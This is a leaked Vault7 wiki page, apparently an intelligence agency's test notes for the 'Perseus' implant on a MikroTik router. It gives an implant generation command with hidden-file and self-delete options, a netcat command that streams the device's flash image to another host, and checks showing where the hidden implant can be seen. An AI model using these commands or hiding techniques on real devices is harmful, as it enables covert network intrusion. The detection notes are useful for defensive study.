Vault7: CIA Hacking Tools Revealed

Navigation: » Directory » Network Devices Branch (NDB) » Network Devices Branch » Operations/Testing » Perseus » Perseus 1.3.0
Owner: User #14587667
DUT6 - RB800 - v1.3.0 Notes
VLAN: 620 (TOR6 gi1/0/14)
ROS: 6.30
Console Server Rack 6 Port 6
LAN VLAN: 621 (TOR6 gi1/0/15)
Tool Versions Used:
ChimayRed 4.12
TshPatcher 1.0.4
Perseus 1.3.0
Generate Perseus (from ICON3):
python $PERSEUS_BIN -f /flash/rw/hidden -f /flash/etc/rc.d/run.d/S99mcc -f /flash/etc/rc.d/run.d/S99tsh -d /flash/rw/hidden -p /flash/rw/tmp/tshd -S /flash/rw/hidden/startup -s 2 -r /flash/rw/hidden/dont_panic -P /ram/zero -m /flash/rw/small_file.txt -l /flash/rw/large_file.txt $PERSEUS_DEPLOY_PREFIX
Test Report Notes:
- Include limitations from Developer's Quick Start Guide
- /proc/pid/stat indicates name of binary
- /proc/pid/smaps reveals the location of the hidden binary
- /proc/pid/exe is a symlink to hidden binary
- If Perseus is already running and it is started again by running startup, then P will self-delete.
- The following appears as the output to top while Perseus is self-deleting: 1372 1 root R N 220 0.0 0 27.6 /ram/zero /flash/rw/large_file.txt /flash/rw/small_file.txt /flash/rw/hidden/dont_panic /flash/rw/h
Test timeline
- Started configuring scripts to begin Perseus 1.3 testing
- Netinstall ROS 6.30
2/12/2016 - 2/18/2016
- Perseus testing
- Completed Perseus 1.3 Testing and completed Test Report.
Commands to run prior to Implanting:
ID | Status | Task |
29 | complete | find / > /tmp/fs_before.txt |
33 | complete |
Copy filesystem DUT: bb dd if=/dev/mtdRoot bs=1048576 count=512 | bb nc 9001 |
Tests to Run after Implanting:
ID | Status | Task |
28 | complete | Issue "find /" before and after implanting. Diff the results. |
find / > /tmp/fs_after.txt
bb grep -Fxv -f /tmp/fs_after.txt /tmp/fs_before.txt
ID | Status | Task |
30 | complete | Issue "find /" after self-deleting with Perseus. Diff the results. |
find / > /tmp/fs_postdelete.txt
bb grep -Fxv -f /tmp/fs_postdelete.txt /tmp/fs_before.txt
mcc is visible
ID | Status | Task |
1 | complete | lsmod | grep mcc # mcc will appear in list |
2 | complete | ls /lib/modules/3.3.5 #no mcc |
3 | complete | ls /ram/pckg #no mcc |
Inconsistent hiding
ID | Status | Task |
4 | complete | ls /sys/module | grep mcc #mcc should be visible |
5 | complete | ls /sys/kernel | grep mcc # mcc should be hidden |
Check netstat for PID/Program name
ID | Status | Task |
15 | complete | bb netstat -p |
Check if kallsyms shows 'mcc' and its symbols
ID | Status | Task |
16 | complete | cat /proc/kallsyms | bb grep mcc - YES |
Flux appears in firewall connections
ID | Status | Task |
6 | incomplete |
Sequential listing of /proc/pid reveals hidden directories.
ID | Status | Task |
7 | complete | Run following script: ./ - YES |
#echo "PIDs in /proc/" > proc_dirs
while [ $i -lt 1000 ];
test -d /proc/$i && echo $i >> proc_dirs
bb ls -1v /proc > ls_dirs
bb grep -Fxv -f ls_dirs proc_dirs
Check if connection is attempted to
ID | Status | Task |
8 | complete |
Inspect Memory (before and after removing Perseus) Haven't figure out way to dump memory on PPC.
ID | Status | Task |
9 | incomplete | |
10 | incomplete | |
11 | incomplete | |
12 | incomplete | |
13 | incomplete | |
14 | incomplete |
Verify Files Hidden
ID | Status | Task |
0 | complete | bb ps ax | bb grep "[s]tartup" |
17 | complete | bb ps ax | grep "[t]sh" |
18 | complete | bb ps ax | grep "[f]lx" |
Check if startup scripts appear when TAB pressed: No
ID | Status | Task |
24 | complete | cd /flash/etc/rc.d/run.d |
25 | complete | ls <tab> |
Check that flux works at gateway
ID | Status | Task |
19 | complete | Set flux as gateway. Open browser and go to and make sure it returns the IP of your flux node. |
ID | Status | Task |
20 | complete | Reboot and check if processes still exist |
21 | complete | Remove Perseus and inspect for remnants |
22 | complete | Remove Peseus and check if current running tshd and flx are present |
27 | complete | Check for zombies processes after deleting Perseus - use 'top' command |
ID | Status | Task |
23 | complete | Re-install Perseus if Perseus is already installed - Perseus will self-delete |
ID | Status | Task |
26 | complete | Compare pre- and post-exploit CPU, memory, and disk usage |
- system resource print
- system resource monitor
- system resource print
Investigate DUTDevice Under Test filesystem on ICON
ID | Status | Task |
31 | complete | Copy filesystem Locate mount-point: bb cat /proc/mounts OR bb df -h OR bb df -i |
ICON: nc -l -p 9001 | dd of=~/dut6.img
DUT: bb dd if=/dev/mtdRoot bs=1048576 count=512 | bb nc 9001
ID | Status | Task |
32 | complete | Inspect filesystem with hex editor |
Pre-Implant resource usage: Post-Implant resource usage:
Note: The disk space used is due to the large version of busybox that was uploaded.
Previous versions:
| 1 empty | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 |